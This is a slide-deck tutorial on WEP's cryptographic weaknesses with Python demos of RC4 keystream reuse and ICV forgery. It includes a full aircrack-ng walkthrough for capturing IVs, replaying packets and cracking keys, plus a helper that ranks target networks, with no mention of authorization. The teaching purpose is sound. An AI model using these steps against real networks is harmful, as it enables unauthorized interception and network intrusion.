Wireless Attacks: WEP Module Type: Basic Method Module Number: 0x00

1 Wireless Attacks: WEP Module Type: Basic Method Module Number: 0x00
Last Updated: Author: Hermit

2 Topics
Common Terminology
What is WEP?
How is WEP Vulnerable?
The Attack: Step by Step
Additional Resources

3 Common Terminology
Wireless Local Area Network (WLAN): A network whose links are wireless instead of physical cables. Clients communicate with access points (APs), which relay traffic to external networks. Defined by the IEEE 802.11 family of specifications.
Radio Frequency (RF): An electromagnetic wave, as used by AM or FM radio. WLANs use pre-defined frequency ranges called channels; in the 2.4 GHz band they are numbered 1 through 14 (which of them may legally be used varies by country).
Initialization Vector (IV): A value intended to be used only once, combined with a shared secret so that the same secret yields a different keystream for every packet. IVs are also called "nonces" (number used once). In WEP the IV is transmitted in the clear with each packet.

4 Common Terminology Wireless interfaces are commonly described by seven operating modes (the names used by the Linux wireless tools):
Master: Act as an AP.
Managed: Act as a client (station).
Monitor: Capture every frame on a channel, from any network, without associating first. This is the mode the attack below requires.
Promiscuous: Pass all frames of the associated network to the CPU; this does require associating first, but allows injection back into the associated network.
Ad-hoc: No central AP or infrastructure; each device communicates directly with every other device. Ad-hoc and mesh are not exclusive.
Mesh: Each device can relay/route packets for other devices, so traffic may cross several hops instead of a single direct link.
Repeater: Act as a "dumb" repeater and retransmit received signals.

5 Common Terminology
Service Set Identifier (SSID): The human readable "friendly" name of a WLAN.
Basic SSID (BSSID): The MAC address of an AP.
Extended SSID (ESSID): A collection of BSSIDs sharing one SSID; for practical purposes (and in the aircrack-ng tools) it is treated as equivalent to the SSID.

6 What is WEP? Wired Equivalent Privacy (WEP) is a security protocol for WLANs that suffers from a variety of cryptographic and design weaknesses. It was part of the original IEEE 802.11 standard (1997) and has been formally deprecated since 2004. It uses either a 64-bit or 128-bit key, each of which includes a 24-bit IV:
64 bit = 24 bit IV + 40 bit secret key
128 bit = 24 bit IV + 104 bit secret key
It uses the RC4 stream cipher to encrypt, with the per-packet RC4 key formed by prepending the IV to the secret key. It is useless from a security perspective and easily cracked.

7 How is WEP Vulnerable? A stream cipher such as RC4 is only safe if each keystream is used once. WEP builds the per-packet RC4 key as IV || pre-shared key, where the key is fixed (40 or 104 bits) and the IV is only 24 bits and is sent in the clear. There are at most 16,777,216 IVs, so a busy network repeats them within hours, and a repeated IV means a repeated keystream: XORing two such ciphertexts cancels the keystream and leaves the XOR of the two plaintexts. Because most of every per-packet key is the same secret, statistical weaknesses in RC4's key schedule (the FMS, KoreK and PTW attacks) recover that secret from just the IV and the first bytes of ciphertext of many packets; with the PTW attack, on the order of 40,000 to 85,000 captured IVs is usually enough for a 104-bit key, and 40-bit keys fall sooner. Even worse, WEP has no replay protection and its integrity check value (ICV) is a plain CRC-32, so an attacker can re-inject a captured encrypted packet (typically an ARP request) to make the AP "just ask" for more packets, each carrying a fresh IV, and can even flip chosen bits of an encrypted packet while patching the ICV so that it still verifies.
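The two weaknesses on this slide, worked through in code. This is an added example, not code from the slides: a toy WEP encrypt/decrypt built on a real RC4, recovery of the keystream from one reused IV with a known plaintext, and a bit-flip forgery that keeps the CRC-32 ICV valid. The key, the reused IV and the ARP-like payloads are constructed for the demo; the birthday-bound function is a back-of-the-envelope estimate, not part of any real attack tool.

```python
import math
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling (KSA) followed by output generation (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))  # truncates to the shorter input


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian, no key involved."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Per-packet RC4 key is IV || shared key; the body is plaintext || ICV.
    The 3-byte IV travels in the clear in front of the ciphertext."""
    assert len(iv) == 3 and len(key) in (5, 13)
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Return (plaintext, icv_ok), the check a receiving station performs."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4_keystream(iv + key, len(body)))
    return data[:-4], data[-4:] == icv(data[:-4])


# Weakness 1: a reused IV is a reused keystream.
def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known plaintext (e.g. the fixed LLC/SNAP + ARP header) gives ks = C ^ (P || ICV)."""
    return xor(frame[3:], known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Any other frame under the same IV yields P || ICV as far as the keystream reaches."""
    return xor(frame[3:], keystream)


# Weakness 2: CRC-32 is linear, so the ICV can be patched without the key.
def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """XOR `delta` (plaintext length) into the encrypted plaintext and fix the ICV:
    crc(P ^ D) == crc(P) ^ crc(D) ^ crc(zeros), so the ICV moves by crc(D) ^ crc(zeros)."""
    icv_mask = xor(icv(delta), icv(bytes(len(delta))))
    return frame[:3] + xor(frame[3:], delta + icv_mask)


def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday bound on at least one repeated IV after `frames` packets."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * 2 ** iv_bits))


# Constructed demo data: a 40-bit key and two ARP-like payloads.
KEY = bytes.fromhex("0102030405")
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")                # same on every ARP frame
ARP_REQUEST = LLC_SNAP_ARP + bytes.fromhex("0001080006040001")  # ends with opcode 1
ARP_REPLY = LLC_SNAP_ARP + bytes.fromhex("0001080006040002")    # ends with opcode 2


def demo() -> dict:
    iv = bytes.fromhex("000001")                   # the AP reuses this IV for both frames
    f_known = wep_encrypt(KEY, iv, ARP_REQUEST)    # attacker knows this plaintext
    f_secret = wep_encrypt(KEY, iv, ARP_REPLY)     # attacker wants this one
    ks = recover_keystream(f_known, ARP_REQUEST)
    recovered = decrypt_with_keystream(f_secret, ks)[:len(ARP_REPLY)]
    # Forge: turn the encrypted reply into a request (opcode 2 -> 1) without KEY.
    delta = bytes(len(ARP_REPLY) - 1) + b"\x03"
    forged_plain, forged_ok = wep_decrypt(KEY, flip_bits(f_secret, delta))
    return {
        "keystream_is_rc4": ks == rc4_keystream(iv + KEY, len(ks)),
        "recovered": recovered,
        "forged_plain": forged_plain,
        "forged_icv_ok": forged_ok,
        "p_collision_5000": iv_collision_probability(5000),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The recovered keystream is exactly the RC4 output for IV || KEY, the second frame decrypts without the key, and the forged frame passes the receiver's ICV check. The last value shows why the 24-bit IV is so small: after only 5,000 frames there is already a better than even chance that some IV has been used twice.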

8 Attack Setup This assumes that you have a 2016 release of Kali Linux installed, as well as a wireless adapter whose driver supports monitor mode and packet injection. If in doubt, get an Alfa card. All commands are expected to be run with superuser (i.e. root) privileges. The aircrack-ng suite is expected to be part of the installation. The interface names used below (wlan0, and wlan0mon once monitor mode is enabled) are what that version of airmon-ng produces; substitute your own if they differ.

9 The Attack: Step by Step (Overview)
1. Open a terminal window.
2. Kill any potentially conflicting applications/services.
3. Identify your wireless device.
4. Put your wireless device into monitor mode.
5. Verify monitor mode.
6. Identify target network.
7. Begin packet capture from target network.
8. (optional) Stimulate IV collection.
9. Crack WEP shared key.

10 The Attack: Step 1 Open a terminal window… no graphics here, because if you can’t do this part then the rest of this guide is really beyond you.

11 The Attack: Step 2 Kill any potentially conflicting applications/services (NetworkManager, wpa_supplicant and similar processes that would otherwise reset the interface or pull it out of monitor mode). airmon-ng check kill

12 The Attack: Step 3 Identify your wireless device (we'll use "wlan0" for this tutorial; on newer systems iw dev is the more reliable way to list wireless interfaces and their type). ifconfig -a

13 The Attack: Step 4 Put your wireless device into monitor mode. This creates a separate monitor interface, wlan0mon, which the remaining steps use.
airmon-ng start wlan0

14 The Attack: Step 5 Verify monitor mode. The new wlan0mon interface should be listed; iwconfig wlan0mon (Mode:Monitor) or iw dev (type monitor) shows the mode explicitly. ifconfig -a

15 The Attack: Step 6 Identify target network (write down the ESSID, channel, and BSSID). airodump-ng hops channels by default, so leave it running long enough to see every channel; the target is a row whose ENC column reads WEP, and the CH, BSSID and ESSID columns give what you need for the next step. airodump-ng wlan0mon

16 The Attack: Step 7 Begin packet capture from target network. --channel locks the card to the target's channel, --bssid captures only that AP's frames, --ivs saves only the IVs (small files, enough for cracking WEP), and -w sets the output file prefix.
airodump-ng --channel {#} --ivs --bssid {BSSID} -w wep-file wlan0mon

17 The Attack: Step 8 (optional) Stimulate IV collection. Run this in a separate terminal window while leaving the other programs executing: aireplay-ng -2 -b {BSSID} -t 1 -c FF:FF:FF:FF:FF:FF -p 0481 wlan0mon This is interactive packet replay: it picks captured frames matching the filter (from the target BSSID, To-DS bit set, broadcast destination, frame control 0x0481) and re-injects them, and the AP re-encrypts each broadcast with a fresh IV. An AP only accepts injected frames from a station it considers associated, so if the IV count in airodump-ng does not climb, use aireplay-ng's fake authentication mode (-1) first; the ARP request replay mode (-3) is the other common way to generate traffic.

18 The Attack: Step 9 Crack WEP shared key (your file name will vary based upon how many times you have started the capture, since airodump-ng numbers each run). aircrack-ng wep-file-01.ivs Leave this running: it re-reads the file and retries automatically each time roughly 5,000 new IVs have been captured, until the key is recovered. Expect success somewhere in the tens of thousands of IVs for a 104-bit key, far fewer for a 40-bit key. If aircrack-ng reports that it cannot use the PTW attack on your file, recapture without --ivs so that full packets are saved.
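To tie steps 6, 7 and 9 together, here is an added helper that is not part of the slides: it reads the CSV that airodump-ng writes next to its capture when given -w (the prefix plus -01.csv), lists the WEP networks by number of captured IVs, flags which ones have enough to be worth handing to aircrack-ng, and fills in the step 7 command from a chosen row. The column layout is the one airodump-ng writes in the versions I have used; check it against the header line of your own file. The CSV content and the 40,000-IV threshold are constructed/assumed for the example.

```python
import csv

# Assumed rule of thumb: about a 50% chance of recovering a 104-bit key with PTW.
PTW_IV_TARGET = 40_000

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv (not real capture data).
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2016-05-01 10:00:00, 2016-05-01 10:20:00,  6,  54, WEP, WEP, OPN, -40, 1200, 52113, 0.  0.  0.  0, 7, lab-wep,
66:77:88:99:AA:BB, 2016-05-01 10:00:00, 2016-05-01 10:20:00, 11,  54, WEP, WEP, OPN, -70,  900,  8123, 0.  0.  0.  0, 8, corp-wep,
CC:DD:EE:FF:00:11, 2016-05-01 10:00:00, 2016-05-01 10:20:00,  1,  54, WPA2, CCMP, PSK, -55, 1500,     0, 0.  0.  0.  0, 6, not-it,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2016-05-01 10:01:00, 2016-05-01 10:19:00, -50, 4000, 00:11:22:33:44:55, lab-wep
"""


def parse_airodump_csv(text: str) -> list:
    """Return the access-point table as a list of dicts keyed by the header names.
    The table starts at the 'BSSID,' header and ends at the blank line before the
    station table; values are stripped because airodump-ng pads them for alignment."""
    lines = text.splitlines()
    start = next(i for i, line in enumerate(lines) if line.startswith("BSSID,"))
    block = []
    for line in lines[start:]:
        if not line.strip():
            break
        block.append(line)
    rows = []
    for row in csv.DictReader(block, skipinitialspace=True):
        rows.append({k.strip(): (v or "").strip() for k, v in row.items() if k})
    return rows


def wep_targets(rows: list, iv_target: int = PTW_IV_TARGET) -> list:
    """WEP networks only, most IVs first, each flagged with whether cracking is worth a try."""
    targets = []
    for r in rows:
        if "WEP" not in r["Privacy"]:
            continue
        ivs = int(r["# IV"])
        targets.append({"bssid": r["BSSID"], "essid": r["ESSID"],
                        "channel": int(r["channel"]), "ivs": ivs,
                        "ready": ivs >= iv_target})
    return sorted(targets, key=lambda t: t["ivs"], reverse=True)


def capture_command(target: dict, iface: str = "wlan0mon", prefix: str = "wep-file") -> list:
    """The step 7 command line, filled in from a parsed row (argv list, ready for subprocess)."""
    return ["airodump-ng", "--channel", str(target["channel"]), "--ivs",
            "--bssid", target["bssid"], "-w", prefix, iface]


if __name__ == "__main__":
    for t in wep_targets(parse_airodump_csv(SAMPLE_CSV)):
        state = "ready for aircrack-ng" if t["ready"] else "keep capturing"
        print(f"{t['essid']:<10} {t['bssid']} ch {t['channel']:>2} ivs {t['ivs']:>6}  {state}")
        print("   ", " ".join(capture_command(t)))
```

Point it at the real file with `parse_airodump_csv(open("wep-file-01.csv").read())`. The WPA2 row is skipped, the two WEP rows come out ordered by IV count, and only the one past the threshold is marked ready, which is the same judgement you would otherwise make by eye from the #Data column in the airodump-ng screen.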

19 Questions?

20 Additional Resources Technical overview of WEP/WPA cracking methods:
Hermit

